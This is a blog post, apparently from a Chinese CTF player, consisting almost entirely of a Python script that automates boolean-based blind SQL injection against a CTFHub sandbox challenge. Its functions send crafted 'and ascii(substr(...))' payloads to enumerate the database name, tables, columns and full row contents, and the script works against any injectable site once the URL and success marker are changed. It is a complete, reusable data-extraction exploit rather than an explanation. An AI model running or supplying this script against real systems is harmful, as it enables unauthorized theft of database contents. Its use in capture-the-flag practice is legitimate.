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SQL布尔盲注自动化脚本的实现 - wuuconix's blog

发布2023-01-30 15:28:23
发布2023-01-30 15:28:23











import requestsfrom urllib.parse import quotesuccess_flag = "query_success" #成功查询到内容的关键字base_url = "http://challenge-d41158772186d1b6.sandbox.ctfhub.com:10800/?id="headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}def get_database_length(): global success_flag, base_url, headers, cookies length = 1 while (1): id = "1 and length(database()) = " + str(length) url = base_url + quote(id) #很重要,因为id中有许多特殊字符,比如#,需要进行url编码 response = requests.get(url, headers=headers).text if (success_flag not in response): print("database length", length, "failed!") length+=1 else: print("database length", length, "success") print("payload:", id) break print("数据库名的长度为", length) return lengthdef get_database(database_length): global success_flag, base_url, headers, cookies database = "" for i in range(1, database_length + 1): l, r = 0, 127 #神奇的申明方法 while (1): ascii = (l + r) // 2 id_equal = "1 and ascii(substr(database(), " + str(i) + ", 1)) = " + str(ascii) response = requests.get(base_url + quote(id_equal), headers=headers).text if (success_flag in response): database += chr(ascii) print ("目前已知数据库名", database) break else: id_bigger = "1 and ascii(substr(database(), " + str(i) + ", 1)) > " + str(ascii) response = requests.get(base_url + quote(id_bigger), headers=headers).text if (success_flag in response): l = ascii + 1 else: r = ascii - 1 print("数据库名为", database) return databasedef get_table_num(database): global success_flag, base_url, headers, cookies num = 1 while (1): id = "1 and (select count(table_name) from information_schema.tables where table_schema = '" + database + "') = " + str(num) response = requests.get(base_url + quote(id), headers=headers).text if (success_flag in response): print("payload:", id) print("数据库中有", num, "个表") break else: num += 1 return numdef get_table_length(index, database): global success_flag, base_url, headers, cookies length = 1 while (1): id = "1 and (select length(table_name) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ", 1) = " + str(length) response = requests.get(base_url + quote(id), headers=headers).text if (success_flag not in response): print("table length", length, "failed!") length+=1 else: print("table length", length, "success") print("payload:", id) break print("数据表名的长度为", length) return lengthdef get_table(index, table_length, database): global success_flag, base_url, headers, cookies table = "" for i in range(1, table_length + 1): l, r = 0, 127 #神奇的申明方法 while (1): ascii = (l + r) // 2 id_equal = "1 and (select ascii(substr(table_name, " + str(i) + ", 1)) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ",1) = " + str(ascii) response = requests.get(base_url + quote(id_equal), headers=headers).text if (success_flag in response): table += chr(ascii) print ("目前已知数据库名", table) break else: id_bigger = "1 and (select ascii(substr(table_name, " + str(i) + ", 1)) from information_schema.tables where table_schema = '" + database + "' limit " + str(index) + ",1) > " + str(ascii) response = requests.get(base_url + quote(id_bigger), headers=headers).text if (success_flag in response): l = ascii + 1 else: r = ascii - 1 print("数据表名为", table) return tabledef get_column_num(table): global success_flag, base_url, headers, cookies num = 1 while (1): id = "1 and (select count(column_name) from information_schema.columns where table_name = '" + table + "') = " + str(num) response = requests.get(base_url + quote(id), headers=headers).text if (success_flag in response): print("payload:", id) print("数据表", table, "中有", num, "个字段") break else: num += 1 return numdef get_column_length(index, table): global success_flag, base_url, headers, cookies length = 1 while (1): id = "1 and (select length(column_name) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ", 1) = " + str(length) response = requests.get(base_url + quote(id), headers=headers).text if (success_flag not in response): print("column length", length, "failed!") length+=1 else: print("column length", length, "success") print("payload:", id) break print("数据表", table, "第", index, "个字段的长度为", length) return lengthdef get_column(index, column_length, table): global success_flag, base_url, headers, cookies column = "" for i in range(1, column_length + 1): l, r = 0, 127 #神奇的申明方法 while (1): ascii = (l + r) // 2 id_equal = "1 and (select ascii(substr(column_name, " + str(i) + ", 1)) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ",1) = " + str(ascii) response = requests.get(base_url + quote(id_equal), headers=headers).text if (success_flag in response): column += chr(ascii) print ("目前已知字段为", column) break else: id_bigger = "1 and (select ascii(substr(column_name, " + str(i) + ", 1)) from information_schema.columns where table_name = '" + table + "' limit " + str(index) + ",1) > " + str(ascii) response = requests.get(base_url + quote(id_bigger), headers=headers).text if (success_flag in response): l = ascii + 1 else: r = ascii - 1 print("数据表", table, "第", index, "个字段名为", column) return columndef get_flag_num(column, table): global success_flag, base_url, headers, cookies num = 1 while (1): id = "1 and (select count(" + column + ") from " + table + ") = " + str(num) response = requests.get(base_url + quote(id), headers=headers).text if (success_flag in response): print("payload:", id) print("数据表", table, "中有", num, "行数据") break else: num += 1 return numdef get_flag_length(index, column, table): global success_flag, base_url, headers, cookies length = 1 while (1): id = "1 and (select length(" + column + ") from " + table + " limit " + str(index) + ", 1) = " + str(length) response = requests.get(base_url + quote(id), headers=headers).text if (success_flag not in response): print("flag length", length, "failed!") length+=1 else: print("flag length", length, "success") print("payload:", id) break print("数据表", table, "第", index, "行数据的长度为", length) return lengthdef get_flag(index, flag_length, column, table): global success_flag, base_url, headers, cookies flag = "" for i in range(1, flag_length + 1): l, r = 0, 127 #神奇的申明方法 while (1): ascii = (l + r) // 2 id_equal = "1 and (select ascii(substr(" + column + ", " + str(i) + ", 1)) from " + table + " limit " + str(index) + ",1) = " + str(ascii) response = requests.get(base_url + quote(id_equal), headers=headers).text if (success_flag in response): flag += chr(ascii) print ("目前已知flag为", flag) break else: id_bigger = "1 and (select ascii(substr(" + column + ", " + str(i) + ", 1)) from " + table + " limit " + str(index) + ",1) > " + str(ascii) response = requests.get(base_url + quote(id_bigger), headers=headers).text if (success_flag in response): l = ascii + 1 else: r = ascii - 1 print("数据表", table, "第", index, "行数据为", flag) return flagif __name__ == "__main__": print("---------------------") print("开始获取数据库名长度") database_length = get_database_length() print("---------------------") print("开始获取数据库名") database = get_database(database_length) print("---------------------") print("开始获取数据表的个数") table_num = get_table_num(database) tables = [] print("---------------------") for i in range(0, table_num): print("开始获取第", i + 1, "个数据表的名称的长度") table_length = get_table_length(i, database) print("---------------------") print("开始获取第", i + 1, "个数据表的名称") table = get_table(i, table_length, database) tables.append(table) while(1): #在这个循环中可以进入所有的数据表一探究竟 print("---------------------") print("现在得到了以下数据表", tables) table = input("请在这些数据表中选择一个目标: ") while( table not in tables ): print("你输入有误") table = input("请重新选择一个目标") print("---------------------") print("选择成功,开始获取数据表", table, "的字段数量") column_num = get_column_num(table) columns = [] print("---------------------") for i in range(0, column_num): print("开始获取数据表", table, "第", i + 1, "个字段名称的长度") column_length = get_column_length(i, table) print("---------------------") print("开始获取数据表", table, "第", i + 1, "个字段的名称") column = get_column(i, column_length, table) columns.append(column) while(1): #在这个循环中可以获取当前选择数据表的所有字段记录 print("---------------------") print("现在得到了数据表", table, "中的以下字段", columns) column = input("请在这些字段中选择一个目标: ") while( column not in columns ): print("你输入有误") column = input("请重新选择一个目标") print("---------------------") print("选择成功,开始获取数据表", table, "的记录数量") flag_num = get_flag_num(column, table) flags = [] print("---------------------") for i in range(0, flag_num): print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的长度") flag_length = get_flag_length(i, column, table) print("---------------------") print("开始获取数据表", table, "的", column, "字段的第", i + 1, "行记录的内容") flag = get_flag(i, flag_length, column, table) flags.append(flag) print("---------------------") print("现在得到了数据表", table, "中", column, "字段中的以下记录", flags) quit = input("继续切换字段吗?(y/n)") if (quit == 'n' or quit == 'N'): break else: continue quit = input("继续切换数据表名吗?(y/n)") if (quit == 'n' or quit == 'N'): break else: continue print("bye~")


wuuconix/SQL-Blind-Injection-Auto: 自己写的SQL盲注自动化脚本 (github.com)





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